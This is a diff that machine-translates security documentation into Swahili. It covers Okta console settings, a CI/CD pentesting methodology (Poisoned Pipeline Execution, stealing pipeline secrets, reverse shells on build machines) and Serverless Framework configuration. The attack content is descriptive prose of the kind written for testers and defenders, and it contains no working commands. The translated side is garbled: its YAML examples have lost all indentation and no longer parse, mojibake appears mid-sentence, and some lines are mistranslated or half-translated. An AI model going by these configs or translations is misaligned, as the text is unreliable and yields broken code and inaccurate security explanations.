-After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
+Baada ya kufafanua moja au zaidi ya maeneo ya mtandao, unaweza **kuvitumia katika Sera za Kikao za Kimataifa**, **sera za uthibitishaji**, arifa za VPN, na **sheria za kuelekeza**.
-From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly.
+Kutoka kwa mtazamo wa washambuliaji ni ya kuvutia kujua ni IP zipi zinazoruhusiwa (na kuangalia ikiwa kuna **IPs zenye mamlaka zaidi** kuliko nyingine). Kutoka kwa mtazamo wa washambuliaji, ikiwa watumiaji wanapaswa kufikia kutoka anwani maalum ya IP au eneo angalia kuwa kipengele hiki kinatumika ipasavyo.
### Device Integrations
-- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
- - I haven't seen this used yet. TODO
-- **Notification services**: I haven't seen this used yet. TODO
+- **Usimamizi wa Kituo**: Usimamizi wa kituo ni hali ambayo inaweza kutumika katika sera ya uthibitishaji ili kuhakikisha kuwa vifaa vilivyo na usimamizi vina ufikiaji wa programu.
+- Sijawahi kuona hii ikitumika bado. TODO
+- **Huduma za Arifa**: Sijawahi kuona hii ikitumika bado. TODO
### API
-You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**.
+Unaweza kuunda token za API za Okta katika ukurasa huu, na kuona zile ambazo zime **undwa**, **mamlaka** zao, muda wa **kuisha** na **URLs za Chanzo**. Kumbuka kuwa token za API zinaundwa kwa ruhusa za mtumiaji aliyekuwa ameunda token hiyo na ni halali tu ikiwa **mtumiaji** aliyekuwa ameunda ni **hai**.
-The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
+**Vyanzo vya Kuaminika** vinatoa ufikiaji kwa tovuti ambazo unadhibiti na kuamini ili kufikia shirika lako la Okta kupitia API ya Okta.
-There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them.
+Hakupaswi kuwa na token nyingi za API, kwani ikiwa kuna mshambuliaji anaweza kujaribu kuzipata na kuzitumia.
## Workflow
### Automations
-Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
+Automations zinakuwezesha kuunda vitendo vya kiotomatiki vinavyofanyika kulingana na seti ya masharti ya kichocheo yanayotokea wakati wa mzunguko wa maisha wa watumiaji wa mwisho.
-For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
+Kwa mfano, hali inaweza kuwa "Kutokuwepo kwa mtumiaji katika Okta" au "Kuisha kwa nenosiri la mtumiaji katika Okta" na kitendo kinaweza kuwa "Tuma barua pepe kwa mtumiaji" au "Badilisha hali ya maisha ya mtumiaji katika Okta".
## Reports
### Reports
-Download logs. They are **sent** to the **email address** of the current account.
+Pakua kumbukumbu. Zinatumwa kwa **anwani ya barua pepe** ya akaunti ya sasa.
### System Log
-Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
+Hapa unaweza kupata **kumbukumbu za vitendo vilivyofanywa na watumiaji** kwa maelezo mengi kama kuingia katika Okta au katika programu kupitia Okta.
### Import Monitoring
-This can **import logs from the other platforms** accessed with Okta.
+Hii inaweza **kuingiza kumbukumbu kutoka kwa majukwaa mengine** yaliyofikiwa na Okta.
### Rate limits
-Check the API rate limits reached.
+Angalia mipaka ya kiwango cha API iliyofikiwa.
## Settings
### Account
-Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
+Hapa unaweza kupata **taarifa za jumla** kuhusu mazingira ya Okta, kama vile jina la kampuni, anwani, **mwanakandarasi wa bili ya barua pepe**, **mwanakandarasi wa kiufundi wa barua pepe** na pia ni nani anapaswa kupokea masasisho ya Okta na ni aina gani ya masasisho ya Okta.
### Downloads
-Here you can download Okta agents to sync Okta with other technologies.
+Hapa unaweza kupakua wakala wa Okta ili kuunganisha Okta na teknolojia nyingine.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
index 41899af04..ac7b2c8e0 100644
--- a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
+++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
@@ -6,103 +6,99 @@
## VCS
-VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
+VCS inamaanisha **Mfumo wa Kudhibiti Toleo**, mifumo hii inaruhusu waendelezaji **kusimamia msimbo wao wa chanzo**. Mmoja wa kawaida ni **git** na kawaida utaona kampuni zikilitumia katika moja ya **majukwaa** yafuatayo:
- Github
- Gitlab
- Bitbucket
- Gitea
-- Cloud providers (they offer their own VCS platforms)
+- Watoa huduma wa wingu (wanatoa majukwaa yao ya VCS)
## CI/CD Pipelines
-CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
+Pipelines za CI/CD zinawawezesha waendelezaji **kujiandaa kutekeleza msimbo** kwa madhumuni mbalimbali, ikiwa ni pamoja na kujenga, kujaribu, na kupeleka programu. Mifumo hii ya kiotomatiki **inasababishwa na vitendo maalum**, kama vile kusukuma msimbo, maombi ya kuvuta, au kazi zilizopangwa. Zinasaidia katika kuboresha mchakato kutoka kwa maendeleo hadi uzalishaji.
-However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
+Hata hivyo, mifumo hii inahitaji **kutekelezwa mahali fulani** na kawaida kwa **akidi za kibali ili kupeleka msimbo au kufikia taarifa nyeti**.
## VCS Pentesting Methodology
> [!NOTE]
-> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
+> Hata kama baadhi ya majukwaa ya VCS yanaruhusu kuunda pipelines kwa sehemu hii tutachambua tu mashambulizi yanayoweza kutokea kwenye udhibiti wa msimbo wa chanzo.
-Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
+Majukwaa yanayoshikilia msimbo wa mradi wako yana taarifa nyeti na watu wanahitaji kuwa makini sana na ruhusa zinazotolewa ndani ya jukwaa hili. Haya ni baadhi ya matatizo ya kawaida katika majukwaa ya VCS ambayo mshambuliaji anaweza kuyatumia:
-- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
-- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
- - **Register**: Some platforms will just allow external users to create an account.
- - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
- - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
-- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
- - If no secret is in place, the attacker could abuse the webhook of the third party platform
- - If the secret is in the URL, the same happens and the attacker also have the secret
-- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
- - Compromise the main branch to **compromise production**.
- - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
- - **Compromise the pipeline** (check next section)
+- **Leaks**: Ikiwa msimbo wako una leaks katika commits na mshambuliaji anaweza kufikia repo (kwa sababu ni ya umma au kwa sababu ana ufikiaji), anaweza kugundua leaks.
+- **Access**: Ikiwa mshambuliaji anaweza **kufikia akaunti ndani ya jukwaa la VCS** anaweza kupata **nadharia zaidi na ruhusa**.
+- **Register**: Baadhi ya majukwaa yataruhusu tu watumiaji wa nje kuunda akaunti.
+- **SSO**: Baadhi ya majukwaa hayataruhusu watumiaji kujiandikisha, lakini yataruhusu mtu yeyote kufikia kwa SSO halali (hivyo mshambuliaji anaweza kutumia akaunti yake ya github kuingia kwa mfano).
+- **Credentials**: Jina la mtumiaji + Pwd, alama za kibinafsi, funguo za ssh, alama za Oauth, cookies... kuna aina kadhaa za alama ambazo mtumiaji anaweza kuiba ili kufikia kwa njia fulani repo.
+- **Webhooks**: Majukwaa ya VCS yanaruhusu kuunda webhooks. Ikiwa hazijalindwa na siri zisizoonekana, **mshambuliaji anaweza kuzitumia vibaya**.
+- Ikiwa hakuna siri iliyowekwa, mshambuliaji anaweza kuzitumia vibaya webhook ya jukwaa la tatu
+- Ikiwa siri iko katika URL, jambo hilo linaweza kutokea na mshambuliaji pia ana siri hiyo
+- **Code compromise:** Ikiwa mhusika mbaya ana aina fulani ya **kuandika** ufikiaji juu ya repos, anaweza kujaribu **kuiingiza msimbo mbaya**. Ili kufanikiwa anaweza kuhitaji **kuzidi ulinzi wa tawi**. Vitendo hivi vinaweza kufanywa kwa malengo tofauti akilini:
+- Kuathiri tawi kuu ili **kuathiri uzalishaji**.
+- Kuathiri tawi kuu (au matawi mengine) ili **kuathiri mashine za waendelezaji** (kama kawaida wanatekeleza majaribio, terraform au mambo mengine ndani ya repo kwenye mashine zao).
+- **Kuathiri pipeline** (angalia sehemu inayofuata)
## Pipelines Pentesting Methodology
-The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
-These files typically have a consistent name and format, for example ā Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
+Njia ya kawaida zaidi ya kufafanua pipeline, ni kwa kutumia **faili ya usanidi wa CI iliyohifadhiwa katika hazina** ambayo pipeline inajenga. Faili hii inaelezea mpangilio wa kazi zinazotekelezwa, masharti yanayoathiri mtiririko, na mipangilio ya mazingira ya kujenga.\
+Faili hizi kwa kawaida zina jina na muundo wa kawaida, kwa mfano ā Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), na faili za YAML za GitHub Actions zilizo chini ya .github/workflows. Wakati inasababishwa, kazi ya pipeline **inasukuma msimbo** kutoka chanzo kilichochaguliwa (k.m. commit / branch), na **inaendesha amri zilizotajwa katika faili ya usanidi wa CI** dhidi ya msimbo huo.
-Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
+Kwa hivyo lengo kuu la mshambuliaji ni kwa namna fulani **kuathiri faili hizo za usanidi** au **amri wanazotekeleza**.
### PPE - Poisoned Pipeline Execution
-The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
+Njia ya Poisoned Pipeline Execution (PPE) inatumia ruhusa katika hazina ya SCM ili manipulative pipeline ya CI na kutekeleza amri hatari. Watumiaji wenye ruhusa zinazohitajika wanaweza kubadilisha faili za usanidi wa CI au faili nyingine zinazotumiwa na kazi ya pipeline ili kujumuisha amri mbaya. Hii "ina sumu" pipeline ya CI, ikisababisha kutekelezwa kwa amri hizi mbaya.
-For a malicious actor to be successful performing a PPE attack he needs to be able to:
+Ili mhusika mbaya afanikiwe kufanya shambulio la PPE anahitaji kuwa na uwezo wa:
-- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
- - Note that sometimes an **external PR count as "write access"**.
-- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
- - For this, he might need to be able to **bypass branch protections**.
+- Kuwa na **ufikiaji wa kuandika kwenye jukwaa la VCS**, kwani kawaida pipelines husababishwa wakati kusukuma au ombi la kuvuta linafanywa. (Angalia mbinu za pentesting za VCS kwa muhtasari wa njia za kupata ufikiaji).
+- Kumbuka kwamba wakati mwingine **PR ya nje inachukuliwa kama "ufikiaji wa kuandika"**.
+- Hata kama ana ruhusa za kuandika, anahitaji kuwa na uhakika anaweza **kubadilisha faili ya usanidi wa CI au faili nyingine ambazo usanidi unategemea**.
+- Kwa hili, anaweza kuhitaji kuwa na uwezo wa **kuzidi ulinzi wa tawi**.
-There are 3 PPE flavours:
+Kuna ladha 3 za PPE:
-- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
-- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
-- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
- - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
+- **D-PPE**: Shambulio la **Direct PPE** linatokea wakati mhusika **anabadilisha faili ya usanidi wa CI** ambayo itatekelezwa.
+- **I-DDE**: Shambulio la **Indirect PPE** linatokea wakati mhusika **anabadilisha** **faili** ambayo faili ya usanidi wa CI ambayo itatekelezwa **inategemea** (kama faili ya kutengeneza au usanidi wa terraform).
+- **Public PPE au 3PE**: Katika baadhi ya matukio pipelines zinaweza **kusababishwa na watumiaji ambao hawana ufikiaji wa kuandika katika repo** (na ambao huenda hata si sehemu ya shirika) kwa sababu wanaweza kutuma PR.
+- **3PE Command Injection**: Kawaida, pipelines za CI/CD zitakuwa **kuziseti mazingira ya mabadiliko** na **taarifa kuhusu PR**. Ikiwa thamani hiyo inaweza kudhibitiwa na mshambuliaji (kama kichwa cha PR) na inatumika katika **mahali hatari** (kama kutekeleza **amri za sh**), mshambuliaji anaweza **kuingiza amri hapo**.
### Exploitation Benefits
-Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
+Kujua ladha 3 za kuathiri pipeline, hebu tuangalie ni nini mshambuliaji anaweza kupata baada ya uhalifu wa mafanikio:
-- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
- - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
-- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
- - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
- - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
- - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
- - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
-- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
+- **Secrets**: Kama ilivyotajwa hapo awali, pipelines zinahitaji **privileges** kwa kazi zao (kurejesha msimbo, kuujenga, kupeleka...) na ruhusa hizi kwa kawaida **zinatolewa katika siri**. Siri hizi kwa kawaida zinapatikana kupitia **mabadiliko ya mazingira au faili ndani ya mfumo**. Kwa hivyo mshambuliaji daima atajaribu kuhamasisha siri nyingi kadri iwezekanavyo.
+- Kulingana na jukwaa la pipeline mshambuliaji **anaweza kuhitaji kutaja siri katika usanidi**. Hii inamaanisha kwamba ikiwa mshambuliaji cannot kubadilisha usanidi wa pipeline ya CI (**I-PPE** kwa mfano), anaweza **tu kuhamasisha siri ambazo pipeline hiyo ina**.
+- **Computation**: Msimbo unatekelezwa mahali fulani, kulingana na mahali unatekelezwa mshambuliaji anaweza kuwa na uwezo wa pivot zaidi.
+- **On-Premises**: Ikiwa pipelines zinafanywa kwenye premises, mshambuliaji anaweza kumaliza katika **mtandao wa ndani wenye ufikiaji wa rasilimali zaidi**.
+- **Cloud**: Mshambuliaji anaweza kufikia **mashine nyingine katika wingu** lakini pia anaweza **kuhamasisha** alama za IAM/akaunti za huduma **tokens** kutoka kwake ili kupata **ufikiaji zaidi ndani ya wingu**.
+- **Platforms machine**: Wakati mwingine kazi zitatekelezwa ndani ya **mashine za jukwaa la pipelines**, ambazo kawaida ziko ndani ya wingu bila **ufikiaji zaidi**.
+- **Select it:** Wakati mwingine **jukwaa la pipelines litakuwa limepanga mashine kadhaa** na ikiwa unaweza **kubadilisha faili ya usanidi wa CI** unaweza **kuonyesha wapi unataka kutekeleza msimbo mbaya**. Katika hali hii, mshambuliaji labda atatekeleza shell ya kurudi kwenye kila mashine inayowezekana kujaribu kuifanyia kazi zaidi.
+- **Compromise production**: Ikiwa uko ndani ya pipeline na toleo la mwisho linajengwa na kupelekwa kutoka kwake, unaweza **kuathiri msimbo ambao utaishia kutekelezwa katika uzalishaji**.
## More relevant info
### Tools & CIS Benchmark
-- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
+- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) ni zana ya chanzo wazi kwa ajili ya kukagua mnyororo wa usambazaji wa programu yako kwa ajili ya kufuata usalama kulingana na [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). Ukaguzi unalenga mchakato mzima wa SDLC, ambapo unaweza kufichua hatari kutoka wakati wa msimbo hadi wakati wa kupeleka.
### Top 10 CI/CD Security Risk
-Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
+Angalia makala hii ya kuvutia kuhusu hatari 10 bora za CI/CD kulingana na Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
### Labs
-- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
+- Kwenye kila jukwaa ambalo unaweza kukimbia kwa ndani utapata jinsi ya kulizindua ndani ili uweze kulipanga kama unavyotaka kulijaribu
- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
### Automatic Tools
-- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
+- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** ni zana ya uchambuzi wa msimbo wa statiki kwa ajili ya miundombinu kama msimbo.
## References
- [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md
index bf1343702..181687cb4 100644
--- a/src/pentesting-ci-cd/serverless.com-security.md
+++ b/src/pentesting-ci-cd/serverless.com-security.md
@@ -6,7 +6,7 @@
### Organization
-An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **collective group**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications.
+An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **kikundi cha pamoja**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications.
### Team
@@ -19,181 +19,163 @@ An **App** is a logical grouping of related services within an Organization. It
### **Services**
A **Service** is the core component of a Serverless application. It represents your entire serverless project, encapsulating all the functions, configurations, and resources needed. It's typically defined in a `serverless.yml` file, a service includes metadata like the service name, provider configurations, functions, events, resources, plugins, and custom variables.
-
```yaml
service: my-service
provider:
- name: aws
- runtime: nodejs14.x
+name: aws
+runtime: nodejs14.x
functions:
- hello:
- handler: handler.hello
+hello:
+handler: handler.hello
```
-
Function
-A **Function** represents a single serverless function, such as an AWS Lambda function. It contains the code that executes in response to events.
-
-It's defined under the `functions` section in `serverless.yml`, specifying the handler, runtime, events, environment variables, and other settings.
+A **Function** inawakilisha kazi moja isiyo na seva, kama kazi ya AWS Lambda. Inajumuisha msimbo unaotekelezwa kama jibu kwa matukio.
+Imeainishwa chini ya sehemu ya `functions` katika `serverless.yml`, ikitaja mpangilio, mazingira ya utekelezaji, matukio, mabadiliko ya mazingira, na mipangilio mingine.
```yaml
functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
```
-
Event
-**Events** are triggers that invoke your serverless functions. They define how and when a function should be executed.
-
-Common event types include HTTP requests, scheduled events (cron jobs), database events, file uploads, and more.
+**Matukio** ni vichocheo vinavyosababisha kazi zako zisizo na seva. Vinabainisha jinsi na lini kazi inapaswa kutekelezwa.
+Aina za matukio za kawaida ni pamoja na maombi ya HTTP, matukio ya ratiba (kazi za cron), matukio ya hifadhidata, upakuaji wa faili, na mengineyo.
```yaml
functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- - schedule:
- rate: rate(10 minutes)
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+- schedule:
+rate: rate(10 minutes)
```
-
-Resource
+Rasilimali
-**Resources** allow you to define additional cloud resources that your service depends on, such as databases, storage buckets, or IAM roles.
-
-They are specified under the `resources` section, often using CloudFormation syntax for AWS.
+**Rasilimali** zinakuwezesha kufafanua rasilimali za ziada za wingu ambazo huduma yako inategemea, kama vile hifadhidata, ndoo za hifadhi, au majukumu ya IAM.
+Zinabainishwa chini ya sehemu ya `resources`, mara nyingi kwa kutumia sintaksia ya CloudFormation kwa AWS.
```yaml
resources:
- Resources:
- MyDynamoDBTable:
- Type: AWS::DynamoDB::Table
- Properties:
- TableName: my-table
- AttributeDefinitions:
- - AttributeName: id
- AttributeType: S
- KeySchema:
- - AttributeName: id
- KeyType: HASH
- ProvisionedThroughput:
- ReadCapacityUnits: 1
- WriteCapacityUnits: 1
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+TableName: my-table
+AttributeDefinitions:
+- AttributeName: id
+AttributeType: S
+KeySchema:
+- AttributeName: id
+KeyType: HASH
+ProvisionedThroughput:
+ReadCapacityUnits: 1
+WriteCapacityUnits: 1
```
-
-Provider
+Mtoa huduma
The **Provider** object specifies the cloud service provider (e.g., AWS, Azure, Google Cloud) and contains configuration settings relevant to that provider.
-It includes details like the runtime, region, stage, and credentials.
-
+Inajumuisha maelezo kama vile runtime, eneo, hatua, na akreditivu.
```yaml
yamlCopy codeprovider:
- name: aws
- runtime: nodejs14.x
- region: us-east-1
- stage: dev
+name: aws
+runtime: nodejs14.x
+region: us-east-1
+stage: dev
```
-
-Stage and Region
-
-The stage represents different environments (e.g., development, staging, production) where your service can be deployed. It allows for environment-specific configurations and deployments.
+Hatua na Eneo
+Hatua inawakilisha mazingira tofauti (kwa mfano, maendeleo, uanzishaji, uzalishaji) ambapo huduma yako inaweza kuwekwa. Inaruhusu usanidi na uwekaji wa mazingira maalum.
```yaml
provider:
- stage: dev
+stage: dev
```
-
-The region specifies the geographical region where your resources will be deployed. It's important for latency, compliance, and availability considerations.
-
+Mkoa unaelezea eneo la kijiografia ambapo rasilimali zako zitawekwa. Ni muhimu kwa sababu za ucheleweshaji, kufuata sheria, na upatikanaji.
```yaml
provider:
- region: us-west-2
+region: us-west-2
```
-
Plugins
-**Plugins** extend the functionality of the Serverless Framework by adding new features or integrating with other tools and services. They are defined under the `plugins` section and installed via npm.
-
+**Plugins** huongeza uwezo wa Serverless Framework kwa kuongeza vipengele vipya au kuunganishwa na zana na huduma nyingine. Zimefafanuliwa chini ya sehemu ya `plugins` na zinawekwa kupitia npm.
```yaml
plugins:
- - serverless-offline
- - serverless-webpack
+- serverless-offline
+- serverless-webpack
```
-
-Layers
-
-**Layers** allow you to package and manage shared code or dependencies separately from your functions. This promotes reusability and reduces deployment package sizes. They are defined under the `layers` section and referenced by functions.
+Tabaka
+**Tabaka** zinakuwezesha kufunga na kusimamia msimbo au utegemezi wa pamoja tofauti na kazi zako. Hii inakuza matumizi tena na kupunguza ukubwa wa pakiti za kutekeleza. Zinå®ä¹åØ`layers` sehemu na kutajwa na kazi.
```yaml
layers:
- commonLibs:
- path: layer-common
+commonLibs:
+path: layer-common
functions:
- hello:
- handler: handler.hello
- layers:
- - { Ref: CommonLibsLambdaLayer }
+hello:
+handler: handler.hello
+layers:
+- { Ref: CommonLibsLambdaLayer }
```
-
Variables and Custom Variables
-**Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time.
+**Variables** zinawezesha usanidi wa dinamik kwa kuruhusu matumizi ya nafasi za kubadilisha ambazo zinatatuliwa wakati wa kutekeleza.
-- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters.
+- **Syntax:** `${variable}` syntax inaweza kurejelea mazingira ya mazingira, maudhui ya faili, au vigezo vingine vya usanidi.
- ```yaml
- functions:
- hello:
- handler: handler.hello
- environment:
- TABLE_NAME: ${self:custom.tableName}
- ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
+```
-* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`.
+* **Custom Variables:** Sehemu ya `custom` inatumika kufafanua vigezo na usanidi maalum wa mtumiaji ambavyo vinaweza kutumika tena katika `serverless.yml`.
- ```yaml
- custom:
- tableName: my-dynamodb-table
- stage: ${opt:stage, 'dev'}
- ```
+```yaml
+custom:
+tableName: my-dynamodb-table
+stage: ${opt:stage, 'dev'}
+```
@@ -201,103 +183,92 @@ functions:
Outputs
-**Outputs** define the values that are returned after a service is deployed, such as resource ARNs, endpoints, or other useful information. They are specified under the `outputs` section and often used to expose information to other services or for easy access post-deployment.
-
+**Outputs** zinafafanua thamani ambazo zinarejeshwa baada ya huduma kutekelezwa, kama vile ARNs za rasilimali, maeneo ya mwisho, au taarifa nyingine muhimu. Zinabainishwa chini ya sehemu ya `outputs` na mara nyingi hutumiwa kufichua taarifa kwa huduma nyingine au kwa ufikiaji rahisi baada ya kutekelezwa.
```yaml
Ā”outputs:
- ApiEndpoint:
- Description: "API Gateway endpoint URL"
- Value:
- Fn::Join:
- - ""
- - - "https://"
- - Ref: ApiGatewayRestApi
- - ".execute-api."
- - Ref: AWS::Region
- - ".amazonaws.com/"
- - Ref: AWS::Stage
+ApiEndpoint:
+Description: "API Gateway endpoint URL"
+Value:
+Fn::Join:
+- ""
+- - "https://"
+- Ref: ApiGatewayRestApi
+- ".execute-api."
+- Ref: AWS::Region
+- ".amazonaws.com/"
+- Ref: AWS::Stage
```
-
IAM Roles and Permissions
-**IAM Roles and Permissions** define the security credentials and access rights for your functions and other resources. They are managed under the `provider` or individual function settings to specify necessary permissions.
-
+**IAM Roles and Permissions** zinaelezea sifa za usalama na haki za ufikiaji kwa kazi zako na rasilimali nyingine. Zinapaswa kusimamiwa chini ya mipangilio ya `provider` au mipangilio ya kazi binafsi ili kubainisha ruhusa zinazohitajika.
```yaml
provider:
- [...]
- iam:
- role:
- statements:
- - Effect: 'Allow'
- Action:
- - 'dynamodb:PutItem'
- - 'dynamodb:Get*'
- - 'dynamodb:Scan*'
- - 'dynamodb:UpdateItem'
- - 'dynamodb:DeleteItem'
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
```
-
-Environment Variables
-
-**Variables** allow you to pass configuration settings and secrets to your functions without hardcoding them. They are defined under the `environment` section for either the provider or individual functions.
+Vigezo vya Mazingira
+**Vigezo** vinakuruhusu kupitisha mipangilio na siri kwa kazi zako bila kuzihardcode. Vimewekwa chini ya sehemu ya `environment` kwa mtoa huduma au kazi binafsi.
```yaml
provider:
- environment:
- STAGE: ${self:provider.stage}
+environment:
+STAGE: ${self:provider.stage}
functions:
- hello:
- handler: handler.hello
- environment:
- TABLE_NAME: ${self:custom.tableName}
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
```
-
Dependencies
-**Dependencies** manage the external libraries and modules your functions require. They typically handled via package managers like npm or pip, and bundled with your deployment package using tools or plugins like `serverless-webpack`.
-
+**Dependencies** husimamia maktaba na moduli za nje ambazo kazi zako zinahitaji. Kwa kawaida zinashughulikiwa kupitia wasimamizi wa pakiti kama npm au pip, na kufungwa na kifurushi chako cha kutekeleza kwa kutumia zana au nyongeza kama `serverless-webpack`.
